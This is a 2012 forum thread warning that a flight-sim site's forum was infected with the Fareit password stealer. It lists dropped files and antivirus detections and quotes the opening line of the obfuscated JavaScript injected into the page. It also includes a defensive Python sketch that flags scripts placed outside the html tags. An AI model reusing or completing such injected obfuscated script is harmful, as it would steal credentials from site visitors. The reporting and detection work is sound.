
WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 01 Feb 2012, 12:10
by basys

Keep off the Horizon/Playsim forum ATM

Their forum is infected YET AGAIN !!!

Virus is a password stealer - Win32 Fareit.A


Drops a video and icon into c:\windows\syswow64\
video is a GUIDname.avi beginning with 78ec91b

Also drops an exe into C:\Program Data\
filename isecurity.exe
and matching icon onto the desktop.

May be other aspects.



HTH
ATB
Paul

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 01 Feb 2012, 22:40
by GHD
No problem here :dunno:

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 01 Feb 2012, 22:56
by basys
Hi Folks

George -
As of 22:43 tonight the javascript is still present.

Take a look at the index.php's page source,
it's right at the very top,
and outside the html tags.



Your a/v may have automatically quarantined it,
or, hopefully not,
failed to detect it at all. :hide:



MS-SE, AVG, Ad-Aware, Sucuri all detect the script.



From what I can see -
If you've got javascript turned off
or java is not installed,
then you shouldn't have an issue.

Yes I do know they are totally unrelated. :)
But from what I've come across
that javascript supposedly decodes to install a java runtime.



HTH
ATB
Paul
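
The check described in the post above (a script block at the very top of the page source, outside the html tags), as an added example that is not part of the original thread: a Python sketch that parses saved page source and reports any `<script>` element sitting before `<html>` or after `</html>`. The sample pages, class name and function name are constructed for illustration.

```python
from html.parser import HTMLParser

# Constructed sample pages (not taken from the affected site).
SAMPLE_INJECTED = """<script>/* constructed placeholder for injected code */</script>
<!DOCTYPE html>
<html><head><script src="forum.js"></script></head>
<body>Board index</body></html>
"""
SAMPLE_CLEAN = SAMPLE_INJECTED.split("\n", 1)[1]  # same page without line 1

class OutsideHtmlScriptFinder(HTMLParser):
    """Collect <script> elements that sit before <html> or after </html>."""

    def __init__(self):
        super().__init__()
        self.html_open = False   # currently between <html> and </html>
        self.html_seen = False   # an <html> start tag has been seen
        self.findings = []       # one dict per misplaced script
        self._current = None     # finding whose body is being read

    def handle_starttag(self, tag, attrs):
        if tag == "html":
            self.html_open = self.html_seen = True
        elif tag == "script" and not self.html_open:
            where = "after </html>" if self.html_seen else "before <html>"
            self._current = {"line": self.getpos()[0], "where": where,
                             "src": dict(attrs).get("src"), "preview": ""}
            self.findings.append(self._current)

    def handle_data(self, data):
        if self._current is not None:  # keep a short preview for triage
            text = self._current["preview"] + data.strip()
            self._current["preview"] = text[:60]

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_open = False
        elif tag == "script":
            self._current = None

def scripts_outside_html(page_source):
    finder = OutsideHtmlScriptFinder()
    finder.feed(page_source)
    finder.close()
    return finder.findings

if __name__ == "__main__":
    for f in scripts_outside_html(SAMPLE_INJECTED):
        print(f"line {f['line']}: <script> {f['where']}: {f['preview']!r}")
```

A page fragment with no `<html>` tag at all will have every script reported as "before <html>", so run this against the full saved page source rather than a template partial.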

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 02 Feb 2012, 00:13
by GHD
I do have Java installed and MalwareBytes reports no problem.

Remember, this virus was discovered in May last year so most anti-virus systems would know of it.

AVG shows no attempted infection.

Also, I have no reg entries in HKCU\Software\WinRAR

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 02 Feb 2012, 00:24
by TSR2
I'm not seeing anything either Paul *-)

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 02 Feb 2012, 11:57
by basys
Hi Folks

Gents
What are you saying ?
a ) Your antivirus is giving you no warning ?
b ) You can't see the script ?
c ) Both above ?

Please look at the page source for -
http://www.playhorizon.co.uk/forums/index.php

Here's a snippet from the start of the code,
freshly grabbed at 11:01 02/02/2012

```
<script>if(window.document)aa=(Number+[].unshift).substr(0,4);aaa=([].sort+[].sort).substr(0,4);
```

HTH
ATB
Paul

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 02 Feb 2012, 12:06
by 511Flyer
AVG blocked my access yesterday. Today, I can't log on to the site. Blank screen. Tried using the link Paul posted. Same result.

:S

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 02 Feb 2012, 12:08
by basys
Hi Folks

Scratch that.
They've finally pulled the whole site.

Please see - http://www.playhorizon.co.uk/

That's an extremely accusatory message.
Just shows how utterly clueless they are.

ATB
Paul

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 02 Feb 2012, 12:17
by TSR2
Hi Paul,

My AV didn't give a warning. Either way, the text they have put on their page seems neither helpful nor particularly informative. It implies they knew there was an issue yesterday and did nothing about it until today, which is a poor show. *-)

Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012

Posted: 02 Feb 2012, 12:24
by basys
Hi Folks

Ben -
Please see thread over at - earthsimulations forum

HTH
ATB
Paul